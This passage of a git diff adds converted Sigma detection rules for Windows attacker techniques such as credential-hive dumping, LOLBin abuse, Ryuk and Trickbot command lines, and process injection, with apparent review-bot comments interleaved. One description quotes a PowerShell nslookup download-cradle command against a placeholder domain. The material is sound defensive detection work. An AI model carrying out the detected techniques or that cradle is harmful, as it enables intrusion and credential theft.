+ - hklm\sam
+ - hklm\security
+ - HKEY_LOCAL_MACHINE\SAM
+ - HKEY_LOCAL_MACHINE\SECURITY
+ condition: process_creation and (all of selection_*)
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cscript_vbs.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cscript_vbs.yml
new file mode 100644
index 000000000..c3eed9b02
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cscript_vbs.yml
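Review bot: This rule has no `falsepositives` field, unlike every other converted rule in this chunk, so an analyst triaging a hit between `condition:` and `level: high` gets no hint about expected benign sources such as backup or inventory tooling that export hives. Adding `falsepositives:` with `- Unknown`, or a short entry about legitimate hive backups, keeps the converted file consistent with its neighbours and with what the Sigma schema recommends. The nslookup download-cradle rule further down has the same omission.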
@@ -0,0 +1,33 @@
+title: Visual Basic Script Execution
+id: 23250293-eed5-4c39-b57a-841c8933a57d
+status: deprecated
+description: Adversaries may abuse Visual Basic (VB) for execution
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md
+author: frack113
+date: 2022/01/02
+modified: 2023/03/06
+tags:
+ - attack.execution
+ - attack.t1059.005
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_exe:
+ - OriginalFileName:
+ - cscript.exe
+ - wscript.exe
+ - NewProcessName|endswith:
+ - \cscript.exe
+ - \wscript.exe
+ selection_script:
+ CommandLine|contains: .vbs
+ condition: process_creation and (all of selection_*)
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml
new file mode 100644
index 000000000..cde31411b
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml
@@ -0,0 +1,34 @@
+title: Execution via MSSQL Xp_cmdshell Stored Procedure
+id: 344482e4-a477-436c-aa70-7536d18a48c7
+related:
+ - id: d08dd86f-681e-4a00-a92c-1db218754417
+ type: derived
+ - id: 7f103213-a04e-4d59-8261-213dddf22314
+ type: derived
+status: deprecated
+description: Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.
+references:
+ - https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html
+author: Tim Rauch
+date: 2022/09/28
+modified: 2023/03/06
+tags:
+ - attack.execution
+ - attack.t1059
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_img:
+ - NewProcessName|endswith: \cmd.exe
+ - OriginalFileName: Cmd.Exe
+ selection_parent:
+ ParentProcessName|endswith: \sqlservr.exe
+ condition: process_creation and (all of selection_*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_indirect_cmd.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_indirect_cmd.yml
new file mode 100644
index 000000000..afc86af29
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_indirect_cmd.yml
@@ -0,0 +1,35 @@
+title: Indirect Command Execution
+id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02
+status: deprecated
+description: Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md
+ - https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html
+author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+date: 2019/10/24
+modified: 2023/01/04
+tags:
+ - attack.defense_evasion
+ - attack.t1202
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ ParentProcessName|endswith:
+ - \pcalua.exe
+ - \forfiles.exe
+ condition: process_creation and selection
+fields:
+ - SubjectUserName
+ - ComputerName
+ - ParentCommandLine
+ - CommandLine
+falsepositives:
+ - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts.
+ - Legitimate usage of scripts.
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml
new file mode 100644
index 000000000..0610cf5b6
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml
@@ -0,0 +1,47 @@
+title: Indirect Command Exectuion via Forfiles
+id: a85cf4e3-56ee-4e79-adeb-789f8fb209a8
+related:
+ - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02
+ type: obsoletes
+status: deprecated
+description: Detects execition of commands and binaries from the context of "forfiles.exe". This can be used as a LOLBIN in order to bypass application whitelisting.
+references:
+ - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a
+ - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/
+author: Tim Rauch (rule), Elastic (idea), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+date: 2022/10/17
+modified: 2023/01/04
+tags:
+ - attack.defense_evasion
+ - attack.t1202
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_parent:
+ ParentProcessName|endswith: \forfiles.exe
+ selection_c:
+ ParentCommandLine|contains:
+ - ' /c '
+ - ' -c '
+ selection_p:
+ ParentCommandLine|contains:
+ - ' /p '
+ - ' -p '
+ selection_m:
+ ParentCommandLine|contains:
+ - ' /m '
+ - ' -m '
+ filter:
+ CommandLine|contains|all:
+ - xcopy
+ - cmd /c del
+ NewProcessName|endswith: \cmd.exe
+ condition: process_creation and (all of selection_* and not filter)
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml
new file mode 100644
index 000000000..6d53806a4
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml
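Review bot: The title and description carry typos that will surface verbatim in alert output: `title: Indirect Command Exectuion via Forfiles` should read `title: Indirect Command Execution via Forfiles`, and `Detects execition of commands` in the description should read `Detects execution of commands`. These strings are what analysts see and search on, so correcting them in the converted copy is worth a follow-up even though the upstream rule is deprecated.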
@@ -0,0 +1,32 @@
+title: Invoke-Obfuscation RUNDLL LAUNCHER
+id: 056a7ee1-4853-4e67-86a0-3fd9ceed7555
+status: deprecated
+description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
+references:
+ - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 23)
+author: Timur Zinniatullin, oscd.community
+date: 2020/10/18
+modified: 2023/02/21
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains|all:
+ - rundll32.exe
+ - shell32.dll
+ - shellexec_rundll
+ - powershell
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml
new file mode 100644
index 000000000..557299157
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml
@@ -0,0 +1,37 @@
+title: Invoke-Obfuscation Via Use Rundll32
+id: 36c5146c-d127-4f85-8e21-01bf62355d5a
+status: deprecated
+description: Detects Obfuscated Powershell via use Rundll32 in Scripts
+references:
+ - https://github.com/SigmaHQ/sigma/issues/1009
+author: Nikita Nazarov, oscd.community
+date: 2019/10/08
+modified: 2022/12/30
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains|all:
+ - '&&'
+ - rundll32
+ - shell32.dll
+ - shellexec_rundll
+ CommandLine|contains:
+ - value
+ - invoke
+ - comspec
+ - iex
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml
new file mode 100644
index 000000000..53f8e6361
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml
@@ -0,0 +1,36 @@
+title: Monitoring Wuauclt.exe For Lolbas Execution Of DLL
+id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0
+status: experimental
+description: Adversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL.
+references:
+ - https://dtm.uk/wuauclt/
+author: Sreeman
+date: 2020/10/29
+modified: 2022/05/27
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains|all:
+ - wuauclt.exe
+ - /UpdateDeploymentProvider
+ - /Runhandlercomserver
+ filter:
+ CommandLine|contains:
+ - wuaueng.dll
+ - UpdateDeploymentProvider.dll /ClassId
+ condition: process_creation and (selection and not filter)
+falsepositives:
+ - Wuaueng.dll which is a module belonging to Microsoft Windows Update.
+fields:
+ - CommandLine
+level: medium
+tags:
+ - attack.defense_evasion
+ - attack.execution
+ - attack.t1218
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_findstr.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_findstr.yml
new file mode 100644
index 000000000..cc138bcd9
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_findstr.yml
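Review bot: `status: experimental` contradicts the file's placement under `builtin/deprecated/` and the `status: deprecated` carried by every neighbouring rule in this chunk; a consumer that excludes deprecated rules by filtering on status rather than on path would keep loading this one. Either `status: deprecated` or a comment explaining why the file lives in the deprecated tree would resolve the ambiguity. The office file-download rule two hunks down has the same mismatch with `status: test`. As a point of style, the `tags:` block sits after `level:` here rather than with the other metadata as in every other rule in the chunk.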
@@ -0,0 +1,49 @@
+title: Abusing Findstr for Defense Evasion
+id: bf6c39fc-e203-45b9-9538-05397c1b4f3f
+status: deprecated
+description: Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism
+references:
+ - https://lolbas-project.github.io/lolbas/Binaries/Findstr/
+ - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
+ - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali
+date: 2020/10/05
+modified: 2022/10/12
+tags:
+ - attack.defense_evasion
+ - attack.t1218
+ - attack.t1564.004
+ - attack.t1552.001
+ - attack.t1105
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_findstr:
+ - CommandLine|contains: findstr
+ - NewProcessName|endswith: findstr.exe
+ - OriginalFileName: FINDSTR.EXE
+ selection_cli_download_1:
+ CommandLine|contains:
+ - ' /v '
+ - ' -v '
+ selection_cli_download_2:
+ CommandLine|contains:
+ - ' /l '
+ - ' -l '
+ selection_cli_creds_1:
+ CommandLine|contains:
+ - ' /s '
+ - ' -s '
+ selection_cli_creds_2:
+ CommandLine|contains:
+ - ' /i '
+ - ' -i '
+ condition: process_creation and (selection_findstr and (all of selection_cli_download* or all of selection_cli_creds*))
+falsepositives:
+ - Administrative findstr usage
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_office.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_office.yml
new file mode 100644
index 000000000..776dc82c5
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_office.yml
@@ -0,0 +1,33 @@
+title: Suspicious File Download Using Office Application
+id: 0c79148b-118e-472b-bdb7-9b57b444cc19
+status: test
+description: Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files
+references:
+ - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/
+ - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/
+ - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/
+ - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
+author: Beyu Denis, oscd.community
+date: 2019/10/26
+modified: 2023/02/04
+tags:
+ - attack.command_and_control
+ - attack.t1105
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains: http
+ NewProcessName|endswith:
+ - \powerpnt.exe
+ - \winword.exe
+ - \excel.exe
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml
new file mode 100644
index 000000000..7641db507
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml
@@ -0,0 +1,33 @@
+title: Process Memory Dumped Via RdrLeakDiag.EXE
+id: 6355a919-2e97-4285-a673-74645566340d
+status: deprecated
+description: Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory
+references:
+ - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/
+author: Florian Roth (Nextron Systems)
+date: 2022/01/04
+modified: 2023/04/24
+tags:
+ - attack.defense_evasion
+ - attack.t1036
+ - attack.t1003.001
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection1:
+ CommandLine|contains: /fullmemdmp
+ NewProcessName|endswith: \rdrleakdiag.exe
+ selection2:
+ CommandLine|contains|all:
+ - /fullmemdmp
+ - ' /o '
+ - ' /p '
+ condition: process_creation and (selection1 or selection2)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbins_by_office_applications.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbins_by_office_applications.yml
new file mode 100644
index 000000000..4dad5de5e
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbins_by_office_applications.yml
@@ -0,0 +1,53 @@
+title: New Lolbin Process by Office Applications
+id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8
+status: deprecated
+description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.
+references:
+ - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
+ - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e
+ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
+ - https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml
+ - https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A
+ - https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set
+author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update)
+date: 2021/08/23
+modified: 2023/02/04
+tags:
+ - attack.t1204.002
+ - attack.t1047
+ - attack.t1218.010
+ - attack.execution
+ - attack.defense_evasion
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ #useful_information: add more LOLBins to the rules logic of your choice.
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ NewProcessName|endswith:
+ - \regsvr32.exe
+ - \rundll32.exe
+ - \msiexec.exe
+ - \mshta.exe
+ - \verclsid.exe
+ - \msdt.exe
+ - \control.exe
+ - \msidb.exe
+ ParentProcessName|endswith:
+ - \winword.exe
+ - \excel.exe
+ - \powerpnt.exe
+ - \msaccess.exe
+ - \mspub.exe
+ - \eqnedt32.exe
+ - \visio.exe
+ - \wordpad.exe
+ - \wordview.exe
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_mal_ryuk.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_mal_ryuk.yml
new file mode 100644
index 000000000..a1027ebb6
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_mal_ryuk.yml
@@ -0,0 +1,37 @@
+title: Ryuk Ransomware Command Line Activity
+id: 0acaad27-9f02-4136-a243-c357202edd74
+related:
+ - id: c37510b8-2107-4b78-aa32-72f251e7a844
+ type: similar
+status: deprecated
+description: Detects Ryuk Ransomware command lines
+references:
+ - https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/
+author: Vasiliy Burov
+date: 2019/08/06
+modified: 2023/02/03
+tags:
+ - attack.execution
+ - attack.t1204
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection1:
+ CommandLine|contains: stop
+ NewProcessName|endswith:
+ - \net.exe
+ - \net1.exe
+ selection2:
+ CommandLine|contains:
+ - samss
+ - audioendpointbuilder
+ - unistoresvc_
+ condition: process_creation and (all of selection*)
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml
new file mode 100644
index 000000000..74518c7cb
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml
@@ -0,0 +1,32 @@
+title: Trickbot Malware Reconnaissance Activity
+id: 410ad193-a728-4107-bc79-4419789fcbf8
+related:
+ - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248
+ type: similar
+status: deprecated
+description: Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.
+references:
+ - https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/
+ - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/
+author: David Burkett, Florian Roth
+date: 2019/12/28
+modified: 2023/04/28
+tags:
+ - attack.discovery
+ - attack.t1482
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains: /domain_trusts /all_trusts
+ ParentProcessName|endswith: \cmd.exe
+ NewProcessName|endswith: \nltest.exe
+ condition: process_creation and selection
+falsepositives:
+ - Rare System Admin Activity
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_mavinject_proc_inj.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_mavinject_proc_inj.yml
new file mode 100644
index 000000000..891295519
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_mavinject_proc_inj.yml
@@ -0,0 +1,28 @@
+title: MavInject Process Injection
+id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8
+status: deprecated
+description: Detects process injection using the signed Windows tool Mavinject32.exe
+author: Florian Roth (Nextron Systems)
+references:
+ - https://twitter.com/gN3mes1s/status/941315826107510784
+ - https://reaqta.com/2017/12/mavinject-microsoft-injector/
+ - https://twitter.com/Hexacorn/status/776122138063409152
+date: 2018/12/12
+modified: 2022/12/19
+tags:
+ - attack.t1055.001
+ - attack.t1218
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains: ' /INJECTRUNNING '
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_msdt_diagcab.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_msdt_diagcab.yml
new file mode 100644
index 000000000..47767c955
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_msdt_diagcab.yml
@@ -0,0 +1,33 @@
+title: Execute MSDT.EXE Using Diagcab File
+id: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3
+status: deprecated
+description: Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in CVE-2022-30190
+references:
+ - https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab
+ - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0
+ - https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd
+author: GossiTheDog, frack113
+date: 2022/06/09
+modified: 2023/02/06
+tags:
+ - attack.defense_evasion
+ - attack.t1202
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_img:
+ - NewProcessName|endswith: \msdt.exe
+ - OriginalFileName: msdt.exe
+ selection_cmd:
+ CommandLine|contains:
+ - ' /cab'
+ - ' -cab'
+ condition: process_creation and (all of selection_*)
+falsepositives:
+ - Legitimate usage of ".diagcab" files
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_new_service_creation.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_new_service_creation.yml
new file mode 100644
index 000000000..507e52d18
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_new_service_creation.yml
@@ -0,0 +1,34 @@
+title: New Service Creation
+id: 7fe71fc9-de3b-432a-8d57-8c809efc10ab
+status: deprecated
+description: Detects creation of a new service.
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md
+author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
+date: 2019/10/21
+modified: 2023/02/20
+tags:
+ - attack.persistence
+ - attack.privilege_escalation
+ - attack.t1543.003
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_sc:
+ CommandLine|contains|all:
+ - create
+ - binPath
+ NewProcessName|endswith: \sc.exe
+ selection_posh:
+ CommandLine|contains|all:
+ - New-Service
+ - -BinaryPathName
+ condition: process_creation and (1 of selection*)
+falsepositives:
+ - Legitimate administrator or user creates a service for legitimate reasons.
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml
new file mode 100644
index 000000000..1fbb4098f
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml
@@ -0,0 +1,27 @@
+title: Nslookup PwSh Download Cradle
+id: 72671447-4352-4413-bb91-b85569687135
+status: deprecated
+description: This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
+references:
+ - https://twitter.com/alh4zr3d/status/1566489367232651264
+author: Zach Mathis (@yamatosecurity)
+date: 2022/09/06
+modified: 2022/12/14 # Deprecation date
+tags:
+ - attack.command_and_control
+ - attack.t1105
+ - attack.t1071.004
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains: '=txt '
+ ParentProcessName|endswith: \powershell.exe
+ NewProcessName|contains: nslookup
+ condition: process_creation and selection
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_odbcconf_susp_exec.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_odbcconf_susp_exec.yml
new file mode 100644
index 000000000..05c5cab7c
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_odbcconf_susp_exec.yml
@@ -0,0 +1,42 @@
+title: Application Whitelisting Bypass via DLL Loaded by odbcconf.exe
+id: 65d2be45-8600-4042-b4c0-577a1ff8a60e
+status: deprecated
+description: Detects defence evasion attempt via odbcconf.exe execution to load DLL
+references:
+ - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/
+ - https://twitter.com/Hexacorn/status/1187143326673330176
+ - https://redcanary.com/blog/raspberry-robin/
+ - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca
+author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community
+date: 2019/10/25
+modified: 2023/05/22
+tags:
+ - attack.defense_evasion
+ - attack.t1218.008
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_1_img:
+ - NewProcessName|endswith: \odbcconf.exe
+ - OriginalFileName: odbcconf.exe
+ selection_1_cli:
+ CommandLine|contains:
+ - -a
+ - -f
+ - /a
+ - /f
+ - regsvr
+ selection_2_parent:
+ ParentProcessName|endswith: \odbcconf.exe
+ selection_2_img:
+ - NewProcessName|endswith: \rundll32.exe
+ - OriginalFileName: RUNDLL32.EXE
+ condition: process_creation and (all of selection_1_* or all of selection_2_*)
+falsepositives:
+ - Legitimate use of odbcconf.exe by legitimate user
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml
new file mode 100644
index 000000000..d2f34387b
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml
@@ -0,0 +1,51 @@
+title: Excel Proxy Executing Regsvr32 With Payload
+id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0
+status: deprecated
+description: |
+ Excel called wmic to finally proxy execute regsvr32 with the payload.
+ An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).
+ But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it.
+ Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes.
+references:
+ - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
+ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
+author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)
+date: 2021/08/23
+modified: 2022/12/02
+tags:
+ - attack.t1204.002
+ - attack.t1047
+ - attack.t1218.010
+ - attack.execution
+ - attack.defense_evasion
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ #useful_information: add more LOLBins to the rules logic of your choice.
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_img:
+ - NewProcessName|endswith: \wbem\WMIC.exe
+ - OriginalFileName: wmic.exe
+ selection_other:
+ CommandLine|contains:
+ - regsvr32
+ - rundll32
+ - msiexec
+ - mshta
+ - verclsid
+ CommandLine|contains|all:
+ - process
+ - create
+ - call
+ ParentProcessName|endswith:
+ - \winword.exe
+ - \excel.exe
+ - \powerpnt.exe
+ condition: process_creation and (all of selection_*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml
new file mode 100644
index 000000000..087eabaa7
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml
@@ -0,0 +1,53 @@
